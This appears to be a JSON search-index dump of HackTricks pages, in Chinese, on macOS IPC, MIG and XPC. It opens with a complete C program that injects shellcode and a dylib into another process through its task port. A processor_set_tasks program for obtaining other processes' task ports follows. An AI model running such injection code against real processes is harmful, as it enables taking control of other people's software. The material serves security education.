\\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\"\\n\\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\"\\n\\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\"\\n\\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\"\\n\\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" ; int inject(pid_t pid, const char *lib) { task_t remoteTask;\\nstruct stat buf; // Check if the library exists\\nint rc = stat (lib, &buf); if (rc != 0)\\n{\\nfprintf (stderr, \\"Unable to open library file %s (%s) - Cannot inject\\\\n\\", lib,strerror (errno));\\n//return (-9);\\n} // Get access to the task port of the process we want to inject into\\nkern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask);\\nif (kr != KERN_SUCCESS) {\\nfprintf (stderr, \\"Unable to call task_for_pid on pid %d: %d. Cannot continue!\\\\n\\",pid, kr);\\nreturn (-1);\\n}\\nelse{\\nprintf(\\"Gathered privileges over the task port of process: %d\\\\n\\", pid);\\n} // Allocate memory for the stack\\nmach_vm_address_t remoteStack64 = (vm_address_t) NULL;\\nmach_vm_address_t remoteCode64 = (vm_address_t) NULL;\\nkr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to allocate memory for remote stack in thread: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-2);\\n}\\nelse\\n{ fprintf (stderr, \\"Allocated remote stack @0x%llx\\\\n\\", remoteStack64);\\n} // Allocate memory for the code\\nremoteCode64 = (vm_address_t) NULL;\\nkr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to allocate memory for remote code in thread: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-2);\\n} // Patch shellcode int i = 0;\\nchar *possiblePatchLocation = (injectedCode );\\nfor (i = 0 ; i < 0x100; i++)\\n{ // Patching is crude, but works.\\n//\\nextern void *_pthread_set_self;\\npossiblePatchLocation++; uint64_t addrOfPthreadCreate = dlsym ( RTLD_DEFAULT, \\"pthread_create_from_mach_thread\\"); //(uint64_t) pthread_create_from_mach_thread;\\nuint64_t addrOfPthreadExit = dlsym (RTLD_DEFAULT, \\"pthread_exit\\"); //(uint64_t) pthread_exit;\\nuint64_t addrOfDlopen = (uint64_t) dlopen; if (memcmp (possiblePatchLocation, \\"PTHRDEXT\\", 8) == 0)\\n{\\nmemcpy(possiblePatchLocation, &addrOfPthreadExit,8);\\nprintf (\\"Pthread exit @%llx, %llx\\\\n\\", addrOfPthreadExit, pthread_exit);\\n} if (memcmp (possiblePatchLocation, \\"PTHRDCRT\\", 8) == 0)\\n{\\nmemcpy(possiblePatchLocation, &addrOfPthreadCreate,8);\\nprintf (\\"Pthread create from mach thread @%llx\\\\n\\", addrOfPthreadCreate);\\n} if (memcmp(possiblePatchLocation, \\"DLOPEN__\\", 6) == 0)\\n{\\nprintf (\\"DLOpen @%llx\\\\n\\", addrOfDlopen);\\nmemcpy(possiblePatchLocation, &addrOfDlopen, sizeof(uint64_t));\\n} if (memcmp(possiblePatchLocation, \\"LIBLIBLIB\\", 9) == 0)\\n{\\nstrcpy(possiblePatchLocation, lib );\\n}\\n} // Write the shellcode to the allocated memory\\nkr = mach_vm_write(remoteTask, // Task port\\nremoteCode64, // Virtual Address (Destination)\\n(vm_address_t) injectedCode, // Source\\n0xa9); // Length of the source if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to write remote thread memory: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-3);\\n} // Set the permissions on the allocated code memory\\nkr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to set memory permissions for remote thread\'s code: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-4);\\n} // Set the permissions on the allocated stack memory\\nkr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to set memory permissions for remote thread\'s stack: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-4);\\n} // Create thread to run shellcode\\nstruct arm_unified_thread_state remoteThreadState64;\\nthread_act_t remoteThread; memset(&remoteThreadState64, \'\\\\0\', sizeof(remoteThreadState64) ); remoteStack64 += (STACK_SIZE / 2); // this is the real stack\\n//remoteStack64 -= 8; // need alignment of 16 const char* p = (const char*) remoteCode64; remoteThreadState64.ash.flavor = ARM_THREAD_STATE64;\\nremoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT;\\nremoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64;\\nremoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; printf (\\"Remote Stack 64 0x%llx, Remote code is %p\\\\n\\", remoteStack64, p ); kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64,\\n(thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); if (kr != KERN_SUCCESS) {\\nfprintf(stderr,\\"Unable to create remote thread: error %s\\", mach_error_string (kr));\\nreturn (-3);\\n} return (0);\\n} int main(int argc, const char * argv[])\\n{\\nif (argc < 3)\\n{\\nfprintf (stderr, \\"Usage: %s _pid_ _action_\\\\n\\", argv[0]);\\nfprintf (stderr, \\" _action_: path to a dylib on disk\\\\n\\");\\nexit(0);\\n} pid_t pid = atoi(argv[1]);\\nconst char *action = argv[2];\\nstruct stat buf; int rc = stat (action, &buf);\\nif (rc == 0) inject(pid,action);\\nelse\\n{\\nfprintf(stderr,\\"Dylib not found\\\\n\\");\\n} } bash gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector\\n./inject ","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 通过任务端口在线程中注入 Dylib","id":"2412","title":"通过任务端口在线程中注入 Dylib"},"2413":{"body":"在此技术中,进程的一个线程被劫持: macOS Thread Injection via Task port","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 线程劫持通过任务端口","id":"2413","title":"线程劫持通过任务端口"},"2414":{"body":"当调用 task_for_pid 或 thread_create_* 时,会在内核的任务结构中递增一个计数器,该计数器可以通过用户模式调用 task_info(task, TASK_EXTMOD_INFO, ...)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 任务端口注入检测","id":"2414","title":"任务端口注入检测"},"2415":{"body":"当线程中发生异常时,该异常会被发送到线程的指定异常端口。如果线程不处理它,则会发送到任务异常端口。如果任务不处理它,则会发送到由 launchd 管理的主机端口(在这里会被确认)。这称为异常分类。 请注意,通常如果没有正确处理,报告最终会被 ReportCrash 守护进程处理。然而,任务中的另一个线程可以管理该异常,这就是崩溃报告工具如 PLCreashReporter 所做的。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 异常端口","id":"2415","title":"异常端口"},"2416":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 其他对象","id":"2416","title":"其他对象"},"2417":{"body":"任何用户都可以访问有关时钟的信息,但要设置时间或修改其他设置,必须是 root。 为了获取信息,可以调用 clock 子系统中的函数,如:clock_get_time、clock_get_attributtes 或 clock_alarm 为了修改值,可以使用 clock_priv 子系统中的函数,如 clock_set_time 和 clock_set_attributes","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 时钟","id":"2417","title":"时钟"},"2418":{"body":"处理器 API 允许通过调用函数如 processor_start、processor_exit、processor_info、processor_get_assignment 来控制单个逻辑处理器... 此外, 处理器集 API 提供了一种将多个处理器分组的方法。可以通过调用 processor_set_default 来检索默认处理器集。 以下是一些与处理器集交互的有趣 API: processor_set_statistics processor_set_tasks: 返回处理器集中所有任务的发送权限数组 processor_set_threads: 返回处理器集中所有线程的发送权限数组 processor_set_stack_usage processor_set_info 正如在 这篇文章 中提到的,以前这允许绕过之前提到的保护,以通过调用 processor_set_tasks 获取其他进程中的任务端口并控制它们,并在每个进程中获取主机端口。 如今,您需要 root 权限才能使用该功能,并且这受到保护,因此您只能在未受保护的进程上获取这些端口。 您可以尝试以下代码: processor_set_tasks 代码\\n`c // Maincpart fo the code from https://newosxbook.com/articles/PST2.html\\n//gcc ./port_pid.c -o port_pid #include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include mach_port_t task_for_pid_workaround(int Pid)\\n{ host_t myhost = mach_host_self(); // host self is host priv if you\'re root anyway..\\nmach_port_t psDefault;\\nmach_port_t psDefault_control; task_array_t tasks;\\nmach_msg_type_number_t numTasks;\\nint i; thread_array_t threads;\\nthread_info_data_t tInfo; kern_return_t kr; kr = processor_set_default(myhost, &psDefault); kr = host_processor_set_priv(myhost, psDefault, &psDefault_control);\\nif (kr != KERN_SUCCESS) { fprintf(stderr, \\"host_processor_set_priv failed with error %x\\\\n\\", kr);\\nmach_error(\\"host_processor_set_priv\\",kr); exit(1);} printf(\\"So far so good\\\\n\\"); kr = processor_set_tasks(psDefault_control, &tasks, &numTasks);\\nif (kr != KERN_SUCCESS) { fprintf(stderr,\\"processor_set_tasks failed with error %x\\\\n\\",kr); exit(1); } for (i = 0; i < numTasks; i++)\\n{\\nint pid;\\npid_for_task(tasks[i], &pid);\\nprintf(\\"TASK %d PID :%d\\\\n\\", i,pid);\\nchar pathbuf[PROC_PIDPATHINFO_MAXSIZE];\\nif (proc_pidpath(pid, pathbuf, sizeof(pathbuf)) > 0) {\\nprintf(\\"Command line: %s\\\\n\\", pathbuf);\\n} else {\\nprintf(\\"proc_pidpath failed: %s\\\\n\\", strerror(errno));\\n}\\nif (pid == Pid){\\nprintf(\\"Found\\\\n\\");\\nreturn (tasks[i]);\\n}\\n} return (MACH_PORT_NULL);\\n} // end workaround int main(int argc, char *argv[]) {\\n/*if (argc != 2) {\\nfprintf(stderr, \\"Usage: %s \\\\n\\", argv[0]);\\nreturn 1;\\n} pid_t pid = atoi(argv[1]);\\nif (pid <= 0) {\\nfprintf(stderr, \\"Invalid PID. Please enter a numeric value greater than 0.\\\\n\\");\\nreturn 1;\\n}*/ int pid = 1; task_for_pid_workaround(pid);\\nreturn 0;\\n} ```","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 处理器和处理器集","id":"2418","title":"处理器和处理器集"},"2419":{"body":"Reading time: 14 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » macOS MIG - Mach Interface Generator","id":"2419","title":"macOS MIG - Mach Interface Generator"},"242":{"body":"cordscan, GTPDoor, EchoBackdoor, NoDepDNS – 在前面章节中描述的自定义工具。 FScan : 内网 TCP 扫描 (fscan -p 22,80,443 10.0.0.0/24) Responder : LLMNR/NBT-NS 恶意 WPAD Microsocks + ProxyChains : 轻量级 SOCKS5 转发 FRP (≥0.37) : NAT 穿透 / 资产桥接","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 8. 工具箱","id":"242","title":"8. 工具箱"},"2420":{"body":"MIG 的创建目的是 简化 Mach IPC 代码的生成过程。它基本上 生成所需的代码 以便服务器和客户端根据给定的定义进行通信。即使生成的代码不够优雅,开发者只需导入它,他的代码将比之前简单得多。 定义使用接口定义语言 (IDL) 指定,扩展名为 .defs。 这些定义有 5 个部分: 子系统声明 :关键字 subsystem 用于指示 名称 和 id 。如果服务器应该在内核中运行,也可以将其标记为 KernelServer 。 包含和导入 :MIG 使用 C 预处理器,因此能够使用导入。此外,可以使用 uimport 和 simport 来处理用户或服务器生成的代码。 类型声明 :可以定义数据类型,尽管通常会导入 mach_types.defs 和 std_types.defs。对于自定义类型,可以使用一些语法: [i`n/out]tran:需要从传入消息或传出消息进行转换的函数 c[user/server]type:映射到另一个 C 类型。 destructor:当类型被释放时调用此函数。 操作 :这些是 RPC 方法的定义。有 5 种不同类型: routine:期望回复 simpleroutine:不期望回复 procedure:期望回复 simpleprocedure:不期望回复 function:期望回复","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » 基本信息","id":"2420","title":"基本信息"},"2421":{"body":"创建一个定义文件,在这种情况下是一个非常简单的函数: myipc.defs subsystem myipc 500; // Arbitrary name and id userprefix USERPREF; // Prefix for created functions in the client\\nserverprefix SERVERPREF; // Prefix for created functions in the server #include \\n#include simpleroutine Subtract(\\nserver_port : mach_port_t;\\nn1 : uint32_t;\\nn2 : uint32_t); 请注意,第一个 参数是要绑定的端口 ,而 MIG 将 自动处理回复端口 (除非在客户端代码中调用 mig_get_reply_port())。此外, 操作的 ID 将是 顺序的 ,从指定的子系统 ID 开始(因此,如果某个操作被弃用,它会被删除,并且使用 skip 仍然使用其 ID)。 现在使用 MIG 生成能够相互通信以调用 Subtract 函数的服务器和客户端代码: bash mig -header myipcUser.h -sheader myipcServer.h myipc.defs 在当前目录中将创建几个新文件。 tip 您可以在系统中找到更复杂的示例,使用:mdfind mach_port.defs 并且您可以从与文件相同的文件夹中编译它,使用:mig -DLIBSYSCALL_INTERFACE mach_ports.defs 在文件 myipcServer.c 和 myipcServer.h 中,您可以找到结构 SERVERPREFmyipc_subsystem 的声明和定义,该结构基本上根据接收到的消息 ID 定义要调用的函数(我们指定了起始编号为 500): myipcServer.c\\nmyipcServer.h c /* Description of this subsystem, for use in direct RPC */\\nconst struct SERVERPREFmyipc_subsystem SERVERPREFmyipc_subsystem = {\\nmyipc_server_routine,\\n500, // start ID\\n501, // end ID\\n(mach_msg_size_t)sizeof(union __ReplyUnion__SERVERPREFmyipc_subsystem),\\n(vm_address_t)0,\\n{\\n{ (mig_impl_routine_t) 0,\\n// Function to call\\n(mig_stub_routine_t) _XSubtract, 3, 0, (routine_arg_descriptor_t)0, (mach_msg_size_t)sizeof(__Reply__Subtract_t)},\\n}\\n}; c /* Description of this subsystem, for use in direct RPC */\\nextern const struct SERVERPREFmyipc_subsystem {\\nmig_server_routine_t\\tserver;\\t/* Server routine */\\nmach_msg_id_t\\tstart;\\t/* Min routine number */\\nmach_msg_id_t\\tend;\\t/* Max routine number + 1 */\\nunsigned int\\tmaxsize;\\t/* Max msg size */\\nvm_address_t\\treserved;\\t/* Reserved */\\nstruct routine_descriptor\\t/* Array of routine descriptors */\\nroutine[1];\\n} SERVERPREFmyipc_subsystem; 基于之前的结构,函数 myipc_server_routine 将获取 消息 ID 并返回适当的调用函数: c mig_external mig_routine_t myipc_server_routine\\n(mach_msg_header_t *InHeadP)\\n{\\nint msgh_id; msgh_id = InHeadP->msgh_id - 500; if ((msgh_id > 0) || (msgh_id < 0))\\nreturn 0; return SERVERPREFmyipc_subsystem.routine[msgh_id].stub_routine;\\n} 在这个例子中,我们只在定义中定义了 1 个函数,但如果我们定义了更多函数,它们将位于 SERVERPREFmyipc_subsystem 数组中,第一个将被分配给 ID 500 ,第二个将被分配给 ID 501 ... 如果该函数预期发送一个 reply ,则函数 mig_internal kern_return_t __MIG_check__Reply__ 也会存在。 实际上,可以在 myipcServer.h 中的结构 subsystem_to_name_map_myipc 中识别这种关系(在其他文件中为 **subsystem*to_name_map*\\\\***): c #ifndef subsystem_to_name_map_myipc\\n#define subsystem_to_name_map_myipc \\\\\\n{ \\"Subtract\\", 500 }\\n#endif 最后,一个使服务器正常工作的另一个重要功能是 myipc_server ,它实际上将 调用与接收到的 id 相关的函数 : mig_external boolean_t myipc_server\\n(mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP)\\n{\\n/*\\n* typedef struct {\\n* mach_msg_header_t Head;\\n* NDR_record_t NDR;\\n* kern_return_t RetCode;\\n* } mig_reply_error_t;\\n*/ mig_routine_t routine; OutHeadP->msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REPLY(InHeadP->msgh_bits), 0);\\nOutHeadP->msgh_remote_port = InHeadP->msgh_reply_port;\\n/* 最小大小:routine() 如果不同将更新它 */\\nOutHeadP->msgh_size = (mach_msg_size_t)sizeof(mig_reply_error_t);\\nOutHeadP->msgh_local_port = MACH_PORT_NULL;\\nOutHeadP->msgh_id = InHeadP->msgh_id + 100;\\nOutHeadP->msgh_reserved = 0; if ((InHeadP->msgh_id > 500) || (InHeadP->msgh_id < 500) || ((routine = SERVERPREFmyipc_subsystem.routine[InHeadP->msgh_id - 500].stub_routine) == 0)) { ((mig_reply_error_t *)OutHeadP)->NDR = NDR_record;\\n((mig_reply_error_t *)OutHeadP)->RetCode = MIG_BAD_ID;\\nreturn FALSE;\\n} (*routine) (InHeadP, OutHeadP); return TRUE;\\n} 检查之前高亮的行,访问通过 ID 调用的函数。 以下是创建一个简单的 server 和 client 的代码,其中客户端可以调用服务器的 Subtract 函数: myipc_server.c\\nmyipc_client.c c // gcc myipc_server.c myipcServer.c -o myipc_server #include \\n#include \\n#include \\n#include \\"myipcServer.h\\" kern_return_t SERVERPREFSubtract(mach_port_t server_port, uint32_t n1, uint32_t n2)\\n{\\nprintf(\\"Received: %d - %d = %d\\\\n\\", n1, n2, n1 - n2);\\nreturn KERN_SUCCESS;\\n} int main() { mach_port_t port;\\nkern_return_t kr; // Register the mach service\\nkr = bootstrap_check_in(bootstrap_port, \\"xyz.hacktricks.mig\\", &port);\\nif (kr != KERN_SUCCESS) {\\nprintf(\\"bootstrap_check_in() failed with code 0x%x\\\\n\\", kr);\\nreturn 1;\\n} // myipc_server is the function that handles incoming messages (check previous exlpanation)\\nmach_msg_server(myipc_server, sizeof(union __RequestUnion__SERVERPREFmyipc_subsystem), port, MACH_MSG_TIMEOUT_NONE);\\n} c // gcc myipc_client.c myipcUser.c -o myipc_client #include \\n#include \\n#include #include \\n#include \\n#include \\"myipcUser.h\\" int main() { // Lookup the receiver port using the bootstrap server.\\nmach_port_t port;\\nkern_return_t kr = bootstrap_look_up(bootstrap_port, \\"xyz.hacktricks.mig\\", &port);\\nif (kr != KERN_SUCCESS) {\\nprintf(\\"bootstrap_look_up() failed with code 0x%x\\\\n\\", kr);\\nreturn 1;\\n}\\nprintf(\\"Port right name %d\\\\n\\", port);\\nUSERPREFSubtract(port, 40, 2);\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » 示例","id":"2421","title":"示例"},"2422":{"body":"NDR_record 是由 libsystem_kernel.dylib 导出的,它是一个结构体,允许 MIG 转换数据,使其与所使用的系统无关 ,因为 MIG 被认为是用于不同系统之间的(而不仅仅是在同一台机器上)。 这很有趣,因为如果在二进制文件中找到 _NDR_record 作为依赖项(jtool2 -S | grep NDR 或 nm),这意味着该二进制文件是一个 MIG 客户端或服务器。 此外, MIG 服务器 在 __DATA.__const 中有调度表(或在 macOS 内核中的 __CONST.__constdata 和其他 *OS 内核中的 __DATA_CONST.__const)。这可以通过 jtool2 转储。 而 MIG 客户端 将使用 __NDR_record 通过 __mach_msg 发送给服务器。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » NDR_record","id":"2422","title":"NDR_record"},"2423":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » 二进制分析","id":"2423","title":"二进制分析"},"2424":{"body":"由于许多二进制文件现在使用 MIG 来暴露 mach 端口,因此了解如何 识别 MIG 的使用 以及 MIG 在每个消息 ID 中执行的函数 是很有趣的。 jtool2 可以解析 Mach-O 二进制文件中的 MIG 信息,指示消息 ID 并识别要执行的函数: bash jtool2 -d __DATA.__const myipc_server | grep MIG 此外,MIG 函数只是实际被调用函数的包装,这意味着获取其反汇编并搜索 BL,您可能能够找到实际被调用的函数: bash jtool2 -d __DATA.__const myipc_server | grep BL","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » jtool","id":"2424","title":"jtool"},"2425":{"body":"之前提到过,负责 根据接收到的消息 ID 调用正确函数 的函数是 myipc_server。然而,通常你不会拥有二进制文件的符号(没有函数名称),因此检查 反编译后的样子 是很有趣的,因为它总是非常相似(该函数的代码与暴露的函数无关): myipc_server decompiled 1\\nmyipc_server decompiled 2 int _myipc_server(int arg0, int arg1) {\\nvar_10 = arg0;\\nvar_18 = arg1;\\n// 初始指令以找到正确的函数指针\\n*(int32_t *)var_18 = *(int32_t *)var_10 & 0x1f;\\n*(int32_t *)(var_18 + 0x8) = *(int32_t *)(var_10 + 0x8);\\n*(int32_t *)(var_18 + 0x4) = 0x24;\\n*(int32_t *)(var_18 + 0xc) = 0x0;\\n*(int32_t *)(var_18 + 0x14) = *(int32_t *)(var_10 + 0x14) + 0x64;\\n*(int32_t *)(var_18 + 0x10) = 0x0;\\nif (*(int32_t *)(var_10 + 0x14) <= 0x1f4 && *(int32_t *)(var_10 + 0x14) >= 0x1f4) {\\nrax = *(int32_t *)(var_10 + 0x14);\\n// 调用 sign_extend_64,可以帮助识别该函数\\n// 这将指针存储在 rax 中,指向需要调用的函数\\n// 检查地址 0x100004040 的使用(函数地址数组)\\n// 0x1f4 = 500(起始 ID) rax = *(sign_extend_64(rax - 0x1f4) * 0x28 + 0x100004040); var_20 = rax;\\n// 如果 - else,if 返回 false,而 else 调用正确的函数并返回 true if (rax == 0x0) { *(var_18 + 0x18) = **_NDR_record;\\n*(int32_t *)(var_18 + 0x20) = 0xfffffffffffffed1;\\nvar_4 = 0x0;\\n}\\nelse {\\n// 计算的地址调用带有 2 个参数的正确函数 (var_20)(var_10, var_18); var_4 = 0x1;\\n}\\n}\\nelse {\\n*(var_18 + 0x18) = **_NDR_record;\\n*(int32_t *)(var_18 + 0x20) = 0xfffffffffffffed1;\\nvar_4 = 0x0;\\n}\\nrax = var_4;\\nreturn rax;\\n} 这是在不同的 Hopper 免费版本中反编译的相同函数: int _myipc_server(int arg0, int arg1) {\\nr31 = r31 - 0x40;\\nsaved_fp = r29;\\nstack[-8] = r30;\\nvar_10 = arg0;\\nvar_18 = arg1;\\n// 初始指令以找到正确的函数指针\\n*(int32_t *)var_18 = *(int32_t *)var_10 & 0x1f | 0x0;\\n*(int32_t *)(var_18 + 0x8) = *(int32_t *)(var_10 + 0x8);\\n*(int32_t *)(var_18 + 0x4) = 0x24;\\n*(int32_t *)(var_18 + 0xc) = 0x0;\\n*(int32_t *)(var_18 + 0x14) = *(int32_t *)(var_10 + 0x14) + 0x64;\\n*(int32_t *)(var_18 + 0x10) = 0x0;\\nr8 = *(int32_t *)(var_10 + 0x14);\\nr8 = r8 - 0x1f4;\\nif (r8 > 0x0) {\\nif (CPU_FLAGS & G) {\\nr8 = 0x1;\\n}\\n}\\nif ((r8 & 0x1) == 0x0) {\\nr8 = *(int32_t *)(var_10 + 0x14);\\nr8 = r8 - 0x1f4;\\nif (r8 < 0x0) {\\nif (CPU_FLAGS & L) {\\nr8 = 0x1;\\n}\\n}\\nif ((r8 & 0x1) == 0x0) {\\nr8 = *(int32_t *)(var_10 + 0x14);\\n// 0x1f4 = 500(起始 ID) r8 = r8 - 0x1f4; asm { smaddl x8, w8, w9, x10 };\\nr8 = *(r8 + 0x8);\\nvar_20 = r8;\\nr8 = r8 - 0x0;\\nif (r8 != 0x0) {\\nif (CPU_FLAGS & NE) {\\nr8 = 0x1;\\n}\\n}\\n// 与之前版本相同的 if else\\n// 检查地址 0x100004040 的使用(函数地址数组) if ((r8 & 0x1) == 0x0) { *(var_18 + 0x18) = **0x100004000; *(int32_t *)(var_18 + 0x20) = 0xfffffed1;\\nvar_4 = 0x0;\\n}\\nelse {\\n// 调用计算出的地址,函数应该在这里 (var_20)(var_10, var_18); var_4 = 0x1;\\n}\\n}\\nelse {\\n*(var_18 + 0x18) = **0x100004000;\\n*(int32_t *)(var_18 + 0x20) = 0xfffffed1;\\nvar_4 = 0x0;\\n}\\n}\\nelse {\\n*(var_18 + 0x18) = **0x100004000;\\n*(int32_t *)(var_18 + 0x20) = 0xfffffed1;\\nvar_4 = 0x0;\\n}\\nr0 = var_4;\\nreturn r0;\\n} 实际上,如果你去到函数**0x100004000 ,你会发现 routine_descriptor** 结构的数组。结构的第一个元素是 函数 实现的 地址 ,并且 结构占用 0x28 字节 ,因此每 0x28 字节(从字节 0 开始)你可以获取 8 字节,这将是 将被调用的函数的地址 : 这些数据可以通过 使用这个 Hopper 脚本 提取。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » Assembly","id":"2425","title":"Assembly"},"2426":{"body":"MIG 生成的代码还调用 kernel_debug 以生成有关进入和退出操作的日志。可以使用**trace 或 kdv**检查它们:kdv all | grep MIG","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » Debug","id":"2426","title":"Debug"},"2427":{"body":"*OS Internals, Volume I, User Mode, Jonathan Levin tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » References","id":"2427","title":"References"},"2428":{"body":"Reading time: 17 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC","id":"2428","title":"macOS XPC"},"2429":{"body":"XPC,即 XNU(macOS 使用的内核)进程间通信,是一个用于 macOS 和 iOS 上进程之间通信 的框架。XPC 提供了一种机制,用于在系统上进行 安全的异步方法调用 。它是苹果安全范式的一部分,允许 创建特权分离的应用程序 ,每个 组件 仅以 执行其工作所需的权限 运行,从而限制了被攻陷进程可能造成的损害。 XPC 使用一种进程间通信(IPC)的形式,这是一组方法,允许在同一系统上运行的不同程序相互发送数据。 XPC 的主要优点包括: 安全性 :通过将工作分离到不同的进程中,每个进程仅被授予所需的权限。这意味着即使一个进程被攻陷,它的危害能力也有限。 稳定性 :XPC 有助于将崩溃隔离到发生崩溃的组件。如果一个进程崩溃,可以在不影响系统其余部分的情况下重新启动。 性能 :XPC 允许轻松的并发,因为不同的任务可以在不同的进程中同时运行。 唯一的 缺点 是 将应用程序分离为多个进程 通过 XPC 进行通信的 效率较低 。但在今天的系统中,这几乎是不可察觉的,且其好处更为显著。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » 基本信息","id":"2429","title":"基本信息"},"243":{"body":"5G 注册流程在 NGAP 之上通过 NAS (Non-Access Stratum) 运行。在通过 Security Mode Command/Complete 激活 NAS 安全之前,初始消息既未认证也未加密。这个安全前窗口在你能够观察或篡改 N2 流量时(例如,位于核心内的 on-path、rogue 